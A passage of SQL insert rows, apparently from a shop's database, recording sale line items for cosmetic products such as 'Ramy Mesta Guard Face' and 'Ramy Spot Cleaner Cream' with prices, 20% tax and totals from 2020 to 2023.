(9, 7, '2020-08-23 04:25:11', '2020-08-23 04:25:11', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(10, 8, '2020-08-23 04:29:53', '2020-08-23 04:29:53', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(11, 8, '2020-08-23 04:30:00', '2020-08-23 04:30:00', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 20.0000, 10.8000, 10.8000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(12, 8, '2020-08-23 04:30:10', '2020-08-23 04:30:10', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(13, 9, '2020-08-23 09:50:53', '2020-08-23 09:50:53', 2060, 1, NULL, 0, 'GH786', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 421.0000, 421.0000, NULL, 20.0000, 84.2000, 84.2000, 0.0000, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 421.0000, 421.0000, 421.0000, 421.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(14, 10, '2020-08-24 01:47:45', '2020-08-24 01:47:45', 2055, 1, NULL, 0, 'FF45', 'G clean Handwash Liquid Soap Pump 200ml', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(15, 11, '2020-08-26 03:08:10', '2020-08-26 03:08:10', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 1.0000, 643.0000, 643.0000, NULL, 20.0000, 128.6000, 128.6000, 0.0000, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 643.0000, 643.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(16, 14, '2021-04-13 04:19:44', '2021-04-13 04:19:44', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(18, 15, '2021-04-13 05:45:54', '2021-04-13 05:45:54', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(19, 16, '2021-04-13 05:52:15', '2021-04-13 05:52:15', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 1.0000, 643.0000, 643.0000, NULL, 20.0000, 128.6000, 128.6000, 0.0000, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 643.0000, 643.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(20, 17, '2021-04-13 12:12:36', '2021-04-13 12:12:36', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(21, 18, '2021-04-14 04:55:19', '2021-04-14 04:55:19', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 1.0000, 643.0000, 643.0000, NULL, 20.0000, 128.6000, 128.6000, 0.0000, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 643.0000, 643.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(22, 19, '2021-04-21 10:04:04', '2021-04-21 10:04:04', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(23, 24, '2021-05-03 08:28:41', '2021-05-03 08:28:41', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 1.0000, 643.0000, 643.0000, NULL, 20.0000, 128.6000, 128.6000, 0.0000, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 643.0000, 643.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(24, 24, '2021-05-03 08:39:36', '2021-05-03 08:39:36', 2058, 1, NULL, 0, 'RAMY SPOT LESS FAIRNESS CREAM', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 4.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(25, 25, '2021-05-11 05:11:40', '2021-05-11 05:11:40', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 1.0000, 643.0000, 643.0000, NULL, 20.0000, 128.6000, 128.6000, 0.0000, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 643.0000, 643.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(26, 27, '2021-05-22 07:32:18', '2021-05-22 07:32:18', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 1.0000, 643.0000, 643.0000, NULL, 20.0000, 128.6000, 128.6000, 0.0000, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 643.0000, 643.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(27, 30, '2021-06-07 04:10:03', '2021-06-07 04:10:03', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(28, 31, '2021-06-08 10:57:44', '2021-06-08 10:57:44', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(29, 31, '2021-06-08 11:59:02', '2021-06-08 11:59:02', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2,3', NULL, 0, 0, 100.0000, 4.0000, 111.0000, 111.0000, NULL, 20.0000, 88.8000, 88.8000, 0.0000, 0.0000, 0.0000, 444.0000, 444.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 444.0000, 444.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(30, 32, '2021-06-09 03:59:26', '2021-06-09 03:59:26', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 3.0000, 643.0000, 643.0000, NULL, 20.0000, 385.8000, 385.8000, 0.0000, 0.0000, 0.0000, 1929.0000, 1929.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 1929.0000, 1929.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(31, 32, '2021-06-09 03:59:53', '2021-06-09 03:59:53', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 2.0000, 234.0000, 234.0000, NULL, 20.0000, 93.6000, 93.6000, 0.0000, 0.0000, 0.0000, 468.0000, 468.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 468.0000, 468.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(32, 33, '2021-06-09 06:43:12', '2021-06-09 06:43:12', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(33, 34, '2021-06-09 08:39:09', '2021-06-09 08:58:03', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 2.0000, 643.0000, 643.0000, NULL, 20.0000, 257.2000, 257.2000, 0.0000, 0.0000, 0.0000, 1286.0000, 1286.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 1286.0000, 1286.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(34, 35, '2021-06-09 11:59:41', '2021-06-09 11:59:41', 2064, 1, NULL, 0, 'New Spot', 'New Spot', NULL, '2', NULL, 0, 0, 100.0000, 1.0000, 111.0000, 111.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(35, 37, '2021-06-15 12:31:32', '2021-06-15 12:31:32', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 1.0000, 643.0000, 643.0000, NULL, 20.0000, 128.6000, 128.6000, 0.0000, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 643.0000, 643.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(36, 38, '2021-06-16 06:45:35', '2021-06-16 06:46:13', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 6.0000, 234.0000, 234.0000, NULL, 20.0000, 280.8000, 280.8000, 0.0000, 0.0000, 0.0000, 1404.0000, 1404.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 1404.0000, 1404.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(37, 39, '2021-06-16 12:03:49', '2021-06-16 12:03:49', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(38, 39, '2021-06-16 12:04:19', '2021-06-16 12:04:19', 2058, 1, NULL, 0, 'RAMY SPOT LESS FAIRNESS CREAM', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 4.0000, 1.0000, 321.0000, 321.0000, NULL, 20.0000, 64.2000, 64.2000, 0.0000, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 321.0000, 321.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(39, 54, '2022-01-15 11:28:04', '2022-01-15 11:28:04', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(40, 60, '2022-03-02 13:47:57', '2022-03-02 13:47:59', 2058, 1, NULL, 0, 'RAMY SPOT LESS FAIRNESS CREAM', 'Face Wash Ornamental lemon extract', NULL, '2,3', NULL, 0, 0, 4.0000, 2.0000, 321.0000, 321.0000, NULL, 20.0000, 128.4000, 128.4000, 0.0000, 0.0000, 0.0000, 642.0000, 642.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 321.0000, 321.0000, 642.0000, 642.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(41, 81, '2022-07-30 10:36:39', '2022-07-30 10:36:39', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(42, 85, '2022-08-31 15:48:54', '2022-08-31 15:48:54', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(43, 86, '2022-09-27 13:18:55', '2022-09-27 13:18:55', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(44, 87, '2022-10-07 22:13:50', '2022-10-07 22:13:50', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(45, 88, '2022-10-08 16:38:02', '2022-10-08 16:38:02', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(46, 91, '2022-12-05 21:04:53', '2022-12-05 21:09:32', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2,3', NULL, 0, 0, 1.0000, 65.0000, 54.0000, 54.0000, NULL, 20.0000, 702.0000, 702.0000, 0.0000, 0.0000, 0.0000, 3510.0000, 3510.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 3510.0000, 3510.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(47, 94, '2023-01-18 10:11:01', '2023-01-18 10:11:01', 2063, 1, NULL, 0, 'Ramy Mesta Guard Face', 'Ramy Mesta Guard Face', NULL, '2,3', NULL, 0, 0, NULL, 1.0000, 643.0000, 643.0000, NULL, 20.0000, 128.6000, 128.6000, 0.0000, 0.0000, 0.0000, 643.0000, 643.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 643.0000, 643.0000, 643.0000, 643.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(48, 95, '2023-03-05 17:54:20', '2023-03-05 17:54:20', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(49, 98, '2023-06-27 18:56:11', '2023-06-27 18:56:11', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(50, 99, '2023-06-27 18:56:12', '2023-06-27 18:56:12', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(51, 100, '2023-06-27 19:07:44', '2023-06-27 19:07:44', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(52, 101, '2023-06-27 19:08:00', '2023-06-27 19:08:00', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(53, 102, '2023-06-27 19:23:17', '2023-06-27 19:23:17', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(54, 103, '2023-06-27 19:23:29', '2023-06-27 19:23:29', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(55, 104, '2023-06-27 19:45:20', '2023-06-27 19:45:20', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(56, 105, '2023-06-27 19:45:40', '2023-06-27 19:45:40', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(57, 106, '2023-06-27 20:00:54', '2023-06-27 20:00:54', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(58, 107, '2023-06-27 20:01:14', '2023-06-27 20:01:14', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(59, 108, '2023-06-27 20:17:28', '2023-06-27 20:17:28', 2062, 1, NULL, 0, 'DD53g', 'new Ramy Mesta Guards', NULL, '2,3', NULL, 0, 0, 1.0000, 1.0000, 234.0000, 234.0000, NULL, 20.0000, 46.8000, 46.8000, 0.0000, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 234.0000, 234.0000, 234.0000, 234.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(60, 109, '2023-07-04 19:34:09', '2023-07-04 19:34:09', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 1.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
(61, 110, '2023-07-11 16:32:06', '2023-07-11 16:32:08', 2061, 1, NULL, 0, 'Ramy Spot Cleaner Cream', 'Ramy Spot Cleaner Cream', NULL, '2', NULL, 0, 0, 1.0000, 2.0000, 54.0000, 54.0000, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 'simple', NULL, NULL, NULL, NULL, NULL, 54.0000, 54.0000, 108.0000, 108.0000, 0.0000, 0.0000, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),
